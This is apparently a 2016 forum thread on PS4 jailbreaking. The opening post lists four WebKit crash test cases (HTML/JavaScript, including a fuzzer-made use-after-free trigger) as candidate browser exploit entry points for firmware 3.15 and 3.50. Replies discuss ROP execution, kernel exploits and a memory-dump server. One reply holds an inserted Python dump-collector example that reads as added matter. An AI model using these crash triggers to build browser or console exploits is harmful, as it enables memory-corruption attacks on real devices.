PS4 Jailbreaking. Thread starter: mcmrc1. Start date: Apr 10, 2016 at 12:04 PM.
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
    <script>
    // testRunner exists only inside WebKit's layout-test harness (DumpRenderTree);
    // in a normal browser this block is skipped and the handlers below still run.
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    // beforeload handler of the <object> above.
    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;  // forces a synchronous layout
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code:
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    // Capturing beforeload listener: toggles the time input's value each time
    // a subresource load is about to start (here the <embed> at the bottom).
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    // testRunner exists only inside WebKit's layout-test harness; skipped in a normal browser.
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the source code from the WebKit from Sony ;)
3. Entry Point:
Code:
<script>
// Fuzzer-generated case. inituaf() tries the GC triggers available in IE
// (CollectGarbage) and in WebKit/V8 test shells (window.gc), falling back to a
// busy loop; the empty loops are leftovers of the minimised test case, and the
// function is defined but not called in this snippet.
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

// Runs from the <object>'s beforeload handler below. Every statement is wrapped
// in try/catch so the sequence continues even if an intermediate step throws;
// the "//line N" comments refer to the original, unminimised fuzzer case.
function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}

</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
Attachment: PS4 3.15 Firmware Entry Point.png
 

Comments

Intentions are what make it about backups, tbh. Sure, a person may start off with good intentions, but how easy is it to fall into the wrong path?
So far I've seen all the intentions of backups, which to most is about fame, nothing more. There's a defined line between what's right and what's wrong.
I've watched the scene go through ups and downs enough to know what my direct course of action is.

I don't think, by the way, that somebody who learns how a system works and decides to publish things, or even a way to play backup games, is going down the wrong path.
We are free to share or not.
As for the fame, it is in human nature; others do it for fame and others not.
And for the last... everybody is watching the scene.
But we are not here to see what your direct course is, or mine.
We are here to share our findings.
 
Someone on Twitter showed a PoC of ROP execution on a 3.50 OFW a few days ago via the WebKit (tweet deleted yesterday).
I thought the limit was the dlclose kernel exploit working until 2.57, but I was wrong! It works only until 2.03 :(
The good news is that Fire30's work + dlclose may lead to a "2.03 jailbreak" (end of the "1.76 jailbreak").

But if the ROP exec is working on every OFW, what we ALL really need is a kernel exploit on higher OFW > 2.04.
 
Someone on Twitter showed a PoC of ROP execution on a 3.50 OFW a few days ago via the WebKit (tweet deleted yesterday).
I thought the limit was the dlclose kernel exploit working until 2.57, but I was wrong! It works only until 2.03 :(
The good news is that Fire30's work + dlclose may lead to a "2.03 jailbreak" (end of the "1.76 jailbreak").

But if the ROP exec is working on every OFW, what we ALL really need is a kernel exploit on higher OFW > 2.04.
AFAIK there are people working on the latest OFW. In the last ones there is a way to break in, not from the browser directly but from different paths. I keep reading all day about the scene and I don't remember where I read the article (I'd say it was from wololo's). As I posted before (my opinion), there are a lot of PoCs emerging from forums (and even the exploit/thing that was posted here on page 11), but these are not final releases. I believe that there are sceners working to get something functional before posting. And I really think that the ps4link tools are helping to understand how the PS4 works, giving the devs more options to break the PS4. Just my thoughts, I may be wrong, but this is like a balloon that is going to "pop". As fail0verflow stated: the PS4's security is not that great. They may not be releasing anything, but it gives hope to the scene community to see things like we did in the PSP scene era.
 
Someone on Twitter showed a PoC of ROP execution on a 3.50 OFW a few days ago via the WebKit (tweet deleted yesterday).
I thought the limit was the dlclose kernel exploit working until 2.57, but I was wrong! It works only until 2.03 :(
The good news is that Fire30's work + dlclose may lead to a "2.03 jailbreak" (end of the "1.76 jailbreak").

But if the ROP exec is working on every OFW, what we ALL really need is a kernel exploit on higher OFW > 2.04.
I saw him, and I have an image of this. I also use a program called ps4 dump and a file called websploit, confirmed to have 2 entry points. He said some PS4 applications use an older version of WebKit; it may be the entry point?? Sorry for my bad English.

edit: info of ps4dump

Webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump
Piece of software that listens for commands coming from the ps4.

How to use this
Simply start the server. The server will listen for connections and display the information it receives. To be able to use this you have to combine it with WebsploitPS4.

How to create/receive dumps
Once the server is started, it will automatically listen for dumps. The dump file is stored inside the same directory where the binary is started from. The name of the dump is always the base address where you started to dump from.

If the file already exists then PS4Dump will append the received data to the dump file, else it will create a new one.

So be careful not to overwrite your dumps when you start different dumps from the same base address.

@Chaos Kid @B7U3 C50SS
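The dump-file naming and append behaviour described in that README, as an added example that is not PS4Dump's own code (which is not on this page): a small Python collector that names each dump after its base address, appends later chunks to an existing file, and, as an assumed extra guard against the overwrite hazard the README warns about, refuses a new session that restarts from an already-used base address.

```python
import os
import re
import tempfile

# A base address is given as hex, with or without a 0x prefix.
HEX_ADDR = re.compile(r"^(?:0x)?[0-9a-fA-F]{1,16}$")


def dump_path(dump_dir, base_addr):
    """The dump file is named after the base address the dump started from."""
    if not HEX_ADDR.match(base_addr):
        raise ValueError("bad base address: %r" % base_addr)
    return os.path.join(dump_dir, "%016x.bin" % int(base_addr, 16))


def store_chunk(dump_dir, base_addr, data, session):
    """Append data to the dump for base_addr, creating the file if absent.

    Assumed extra guard (not described for PS4Dump): a .session marker records
    which dump session owns the file, so a later session that restarts from the
    same base address is refused instead of being silently appended to it.
    """
    path = dump_path(dump_dir, base_addr)
    marker = path + ".session"
    os.makedirs(dump_dir, exist_ok=True)
    if os.path.exists(marker):
        with open(marker) as f:
            owner = f.read()
        if owner != session:
            raise FileExistsError("%s already belongs to session %s" % (path, owner))
    else:
        with open(marker, "w") as f:
            f.write(session)
    with open(path, "ab") as f:
        f.write(data)
    return os.path.getsize(path)


def demo():
    """Constructed run in a temp dir: two chunks of one session append; a second session reusing the address is refused."""
    d = tempfile.mkdtemp()
    first = store_chunk(d, "0x200000000", b"\x00" * 16, "run1")
    second = store_chunk(d, "0x200000000", b"\xff" * 16, "run1")
    try:
        store_chunk(d, "200000000", b"\x00", "run2")
        refused = False
    except FileExistsError:
        refused = True
    return first, second, refused, os.path.basename(dump_path(d, "0x200000000"))
```

Dropping the session marker gives exactly the unguarded behaviour the README describes, where a second dump from the same base address is appended to the first.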
 
@toni1988 Since you've come forward with this info, mind telling us up to which system software version it still works, and if there are any limitations at all? Also, since you've come forward with this, does that mean you'll be making a release soon?

EDIT: I mean on that webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump

2nd EDIT: That sounds an awful lot like cfwprpht's work. Strange. Really, it sounds eerily like his work. Unless someone else posted it on a private GitHub repo and I cannot find it for that reason.
 
@toni1988 Since you've come forward with this info, mind telling us up to which system software version it still works, and if there are any limitations at all? Also, since you've come forward with this, does that mean you'll be making a release soon?

EDIT: I mean on that webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump

2nd EDIT: That sounds an awful lot like cfwprpht's work. Strange. Really, it sounds eerily like his work. Unless someone else posted it on a private GitHub repo and I cannot find it for that reason.

Sorry, I use Google Translator (crap) and it changes some words. This info is not from me, it is from a user on Twitter.
 
@toni1988 Since you've come forward with this info, mind telling us up to which system software version it still works, and if there are any limitations at all? Also, since you've come forward with this, does that mean you'll be making a release soon?

EDIT: I mean on that webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump

2nd EDIT: That sounds an awful lot like cfwprpht's work. Strange. Really, it sounds eerily like his work. Unless someone else posted it on a private GitHub repo and I cannot find it for that reason.
Read through the src I sent you. I believe that's what they are using; it does allow a lot of things. I've been going through it all.
 